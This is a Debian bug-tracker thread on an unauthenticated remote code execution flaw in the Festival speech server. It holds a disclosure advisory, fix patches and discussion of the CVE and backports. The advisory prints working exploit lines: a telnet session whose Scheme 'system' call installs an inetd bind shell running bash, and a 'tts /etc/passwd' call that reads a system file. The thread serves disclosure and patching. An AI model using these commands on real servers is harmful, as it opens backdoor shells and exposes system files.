Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? I see your point, I will contact mitre to update the CVE id or to assign a new one. No news from MITRE? At least their CVE entry doesn't appear to be updated. I guess they will happily release a DSA if someone comes up and provides a fixed stable package that just works. I've attached a patch that I think resolves this issue on stable - no warranties. Just wanted to make this final email as I'm intending to release my advisory shortly subject to any updates here. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog 0a1,18 festival (1.4.3-17.3) unstable; urgency=high * Fix root security hole. Thanks to Tim Brown. + debian/festival.init: Read festival.scm upon start. (Closes: #466146) * debian/festival.scm: + Add sane default values for server. The festival init script now uses these values while starting the server. * debian/README.Debian: + Document some changes on daemon mode. * debian/templates, debian/config, debian/festival.postinst: + Ask for server password during install. * debian/lintian-override: + Permission of /etc/festival.scm should be 0600. -- Tim Brown [EMAIL PROTECTED] Sat, 01 Mar 2008 12:40:33 + diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config 0a1,20 #!/bin/sh -e # Source debconf library. . /usr/share/debconf/confmodule # grab selected config values from the config file and store them # in debconf's database # first grab existing value (keep config file's existing value) CONFIG_FILE=/etc/festival.scm # to help security, let password be entered afresh each time # (and don't display the value left in the debconf database of # password written to config file) db_set festival/server_passwd db_input critical festival/server_passwd || true db_go || true db_stop || true diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init 27c27 --exec $DAEMON -- --server --- --exec $DAEMON -- --server -b /etc/festival.scm 39c39 --exec $DAEMON -- --server --- --exec $DAEMON -- --server -b /etc/festival.scm diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst 0a1,50 #!/bin/sh set -e . /usr/share/debconf/confmodule # write selected values into config file CONFIG_FILE=/etc/festival.scm PASSWD_ENTRY=server_passwd PASSWD=your_festival_passwd db_get festival/server_passwd PASSWD=$RET # insert the entry, if it is missing (which it ought not to be) grep -Eq ^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]] $CONFIG_FILE || \ echo (set! $PASSWD_ENTRY \$PASSWD\) $CONFIG_FILE # only process the password if it is not empty if [ $PASSWD ]; then # copy config file here in order to preserve permissions when actually # building the tmp file in the sed step cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp # escape sed special characters #echo $PASSWD | sed -n 's|[\|\$\\.\*\%\^\+\?]|\\|g' PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\\.\*\%\^\+\?\/]|\\|g') sed -e s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! $PASSWD_ENTRY \$PASSWD\)/ \ $CONFIG_FILE $CONFIG_FILE.tmp mv -f $CONFIG_FILE.tmp $CONFIG_FILE # remove the password from the debconf database db_set festival/server_passwd password written to config file fi # extra safety check: ensure passwords in config file cannot be read by anyone chown nobody /etc/festival.scm chmod og-r $CONFIG_FILE # Supporta log file mkdir -p /var/log/festival touch /var/log/festival/festival.log chown nobody:audio /var/log/festival/festival.log # must indicate we are done with debconf, or the script will hang when the # server is started below (DEBHELPER section, via dh_installinit). db_stop #DEBHELPER# diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm 4a5,9 if [ $1 = purge ];then rm -rf /var/log/festival rm -f /etc/festival.scm fi diff -rN festival-1.4.3/debian/festival.scm festival-1.4.3-new/debian/festival.scm 3a4,23 ; Maximum number of clients on the server (set! server_max_clients 10) ; Server port (set! server_port 1314) ; Server password (set! server_passwd nil) ; Log file location (set! server_log_file /var/log/festival/festival.log) ; Server access list (hosts) ; Example: ; (set! server_access_list '([^.]+ 127.0.0.1 localhost.* 192.168.*)) ; Secure default: (set! server_access_list '([^.]+ 127.0.0.1 localhost)) ; Server deny list (hosts) diff -rN festival-1.4.3/debian/lintian.override festival-1.4.3-new/debian/lintian.override
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-03-01 15:28]: On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? I see your point, I will contact mitre to update the CVE id or to assign a new one. No news from MITRE? At least their CVE entry doesn't appear to be updated. Huh? which allows local and remote attackers to execute arbitrary commands Cheers Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpDaKo66f2UP.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Saturday 01 March 2008 14:44:01 Nico Golde wrote: Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-03-01 15:28]: On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? I see your point, I will contact mitre to update the CVE id or to assign a new one. No news from MITRE? At least their CVE entry doesn't appear to be updated. Huh? which allows local and remote attackers to execute arbitrary commands Cheers Nico I saw that, but assumed it would reference Debian in some manner. After all Debian distributions (and derivatives including Ubuntu hardy) are/were exploitable. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-03-01 16:19]: On Saturday 01 March 2008 14:44:01 Nico Golde wrote: [...] Huh? which allows local and remote attackers to execute arbitrary commands [...] I saw that, but assumed it would reference Debian in some manner. After all Debian distributions (and derivatives including Ubuntu hardy) are/were exploitable. Nope I don't think that will happen :/ Cheers Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpulTCk16VyA.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
retitle 466146 festival: CVE-2007-4074 default configuration allows unauthenticated remote code execution thanks Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-17 04:18]: Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown mailto:[EMAIL PROTECTED] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/ Risk: Medium [...] CVE-2007-4074 was assigned to this issue. == Name: CVE-2007-4074 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074 Reference: CONFIRM:http://bugs.gentoo.org/show_bug.cgi?id=170477 Reference: GENTOO:GLSA-200707-10 Reference: URL:http://security.gentoo.org/glsa/glsa-200707-10.xml Reference: SUSE:SUSE-SR:2007:021 Reference: URL:http://lists.opensuse.org/opensuse-security-announce/2007-10/msg6.html Reference: BID:25069 Reference: URL:http://www.securityfocus.com/bid/25069 Reference: SECUNIA:26229 Reference: URL:http://secunia.com/advisories/26229 Reference: SECUNIA:27271 Reference: URL:http://secunia.com/advisories/27271 Reference: XF:gentoo-festival-privilege-escalation(35606) Reference: URL:http://xforce.iss.net/xforce/xfdb/35606 The default configuration of Centre for Speech Technology Research (CSTR) Festival 1.95 beta (aka 2.0 beta) on Gentoo Linux is run locally with elevated privileges without requiring authentication, which allows context-dependent attackers to execute arbitrary commands via the local daemon on port 1314, a different vulnerability than CVE-2001-0956. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpx04RdVc2ox.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote: Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? Dear Nico, It appears that the troublesome issue of running festival as a less privileged user was handled in the last upload. However, what was not handled was the restriction of accesss to localhost by default, and the necessity to introduce a password for this purpose. The last upload, which Tim has checked a few times, introduces this feature, and thus, makes the security aspect a bit more complete. Hope this is fine. Thanks for the follow up. Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpPaCpipoqKF.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, 19 Feb 2008, Kumar Appaiah wrote: On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote: Hi Tim, this is somehow strange, this CVE id was already fixed in 1.4.3-21 referring to the security tracker (see bug #435445 for reference). Did this fix got lost somewhere in the package history? It appears that the troublesome issue of running festival as a less privileged user was handled in the last upload. However, what was not handled was the restriction of accesss to localhost by default, and the necessity to introduce a password for this purpose. The last upload, which Tim has checked a few times, introduces this feature, and thus, makes the security aspect a bit more complete. Hope this is fine. Thanks for the follow up. This is my impression too. Gentoo introduced localhost restrictions in their patch for the original issue, in addition to changing the init process of the server so that it run under its own privileges rather than root- they didn't add authentication though. The Debian patch only changed the init process of the server, which while preventing a full root compromise, did not prevent remote unauthenticated access. Looking at the previous bug history there was some discussion about disabling the system command too, but IMO this does little to fix the underlying problem of an unauthenticated scheme interpreter bound to a remote port with no ACLs or authentication. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Nico, I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpDdl9JFJXZB.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote: * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? Also, since we have a working patch for the issue on mentors what happens now. Can it go through as NMU? What about the backport to stable and testing? Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:57]: On Tuesday 19 February 2008 19:20:23 Nico Golde wrote: * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). Maybe it's also the Access Vector: string, not sure. Florian Weimer knows the details. It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? I see your point, I will contact mitre to update the CVE id or to assign a new one. Also, since we have a working patch for the issue on mentors what happens now. Can it go through as NMU? The maintainer already uploaded a fixed version to unstable so no need for that. An NMU is only needed if the maintainer can't do an upload himself. What about the backport to stable and testing? The package should migrate to testing in two days. If it has problems on migration we may do a testing security upload for this. For stable please contact. Referring to our svn the stable security did not release a DSA for CVE-2007-4074 because it was a minor issue. If you think this should get fixed in stable please contact [EMAIL PROTECTED] I guess they will happily release a DSA if someone comes up and provides a fixed stable package that just works. If not, the maintainer still has a high chance to get this fixed via a regular point update. For this please contact the release team. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpZ2qStpoHiD.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote: Dear Tim, Many thanks for the constant support. The package should now be all right with this change, available at the same location. Not a problem - it seems to build cleanly now with no problems. I guess it can be pushed to unstable and backported to stable security. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
tags 466146 pending thanks On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote: Can I suggest that a password is set (perhaps take a look at the Debian MySQL server package which does something similar for the debian-sys-maint in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an improvement, but as noted it does not guard against local privilege escalation attacks. I have now added this feature. A package is ready for testing at mentors: dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc Please note that I now use debconf to ask for the password to be entered. I have tested that the system works fine, but as this is my first debconf experience, a quick review would be appreciated, followed by upload, as this is a security bug. Thanks. Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote: dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. dsc Please note that I now use debconf to ask for the password to be entered. I have tested that the system works fine, but as this is my first debconf experience, a quick review would be appreciated, followed by upload, as this is a security bug. Kumar, I've just built it here. It is lintian clean and the patch provides the required security fix. However 2 small points, 1) The logging doesn't work as /var/log/festival isn't created (and owned by festival,audio) 2) Passwords are displayed by debconf rather than hiding them with *'s. I'm only a fellow maintainer, but I'm sure your mentor can provide appropriate feedback on these issues. Cheers, Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote: Please note that I now use debconf to ask for the password to be entered. I have tested that the system works fine, but as this is my first debconf experience, a quick review would be appreciated, followed by upload, as this is a security bug. Another thought, the fix will require backporting to stable so that it can go into the security updates. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote: I've just built it here. It is lintian clean and the patch provides the required security fix. However 2 small points, 1) The logging doesn't work as /var/log/festival isn't created (and owned by festival,audio) 2) Passwords are displayed by debconf rather than hiding them with *'s. I'm only a fellow maintainer, but I'm sure your mentor can provide appropriate feedback on these issues. First of all, many thanks for pointing out both these issues. I have solved both, and the fixed version is here: dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc Further comments and feedback would be welcome. Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote: On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote: I've just built it here. It is lintian clean and the patch provides the required security fix. However 2 small points, 1) The logging doesn't work as /var/log/festival isn't created (and owned by festival,audio) 2) Passwords are displayed by debconf rather than hiding them with *'s. I'm only a fellow maintainer, but I'm sure your mentor can provide appropriate feedback on these issues. First of all, many thanks for pointing out both these issues. I have solved both, and the fixed version is here: dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. dsc Looks good apart from Lintian reporting: N: N: chown user.group is called in one of the maintainer scripts. The N: correct syntax is chown user:group. Using . as a separator is still N: supported by the GNU tools, but it will fail as soon as a system uses N: the . in user or group names. N: Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On 18/02/2008, Tim Brown wrote: dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. dsc Looks good apart from Lintian reporting: N: N: chown user.group is called in one of the maintainer scripts. The N: correct syntax is chown user:group. Using . as a separator is still N: supported by the GNU tools, but it will fail as soon as a system uses N: the . in user or group names. N: Dear Tim, Many thanks for the constant support. The package should now be all right with this change, available at the same location. dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6. Thanks again! Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600036 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Package: festival Version: 1.96~beta-5 Severity: critical Tags: security Justification: root security hole Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown mailto:[EMAIL PROTECTED] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Festival 1.96:beta July 2004 http://www.cstr.ed.ac.uk/projects/festival.html Vendor: Centre for Speech Technology Research, University of Edinburgh http://www.cstr.ed.ac.uk/ Risk: Medium Summary The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable. Technical Details The Festival server which can be started using festival --server is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (system echo ' stream tcp nowait festival /bin/bash /bin/bash -i' /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf) Connection closed by foreign host. Whilst this is the most trivial way that the vulnerability can be exploited the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) pose particular interest, for example: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (tts /etc/passwd nil) Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the default unsecure state of the server could be exploited particularly where the user is unaware of the servers existance. Solutions In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access. -- System Information: Debian Release: lenny/sid APT prefers oldstable APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages festival depends on: ii adduser 3.105add and remove users and groups ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio ii libc6 2.7-8GNU C Library: Shared libraries ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library ii libgcc1 1:4.3-20080202-1 GCC support library ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3 ii lsb-base3.1-24 Linux Standard Base 3.1 init scrip ii sgml-base 1.26 SGML infrastructure and SGML catal ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech Versions of packages festival recommends: ii festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
tags 466146 pending thanks Hi! A package is ready for upload at mentors. Thanks for the report. If, after consulting my sponsor and some security people, I find that it is OK, it shall be uploaded. Thanks! Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote: tags 466146 pending thanks Hi! A package is ready for upload at mentors. Thanks for the report. If, after consulting my sponsor and some security people, I find that it is OK, it shall be uploaded. Kumar, Can I suggest that a password is set (perhaps take a look at the Debian MySQL server package which does something similar for the debian-sys-maint in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an improvement, but as noted it does not guard against local privilege escalation attacks. Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote: A package is ready for upload at mentors. Thanks for the report. If, after consulting my sponsor and some security people, I find that it is OK, it shall be uploaded. Kumar, Can I suggest that a password is set (perhaps take a look at the Debian MySQL server package which does something similar for the debian-sys-maint in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an improvement, but as noted it does not guard against local privilege escalation attacks. I shall make an attempt to arrange for this. Thank you for the suggestion. Kumar -- Kumar Appaiah, 458, Jamuna Hostel, Indian Institute of Technology Madras, Chennai - 600 036 signature.asc Description: Digital signature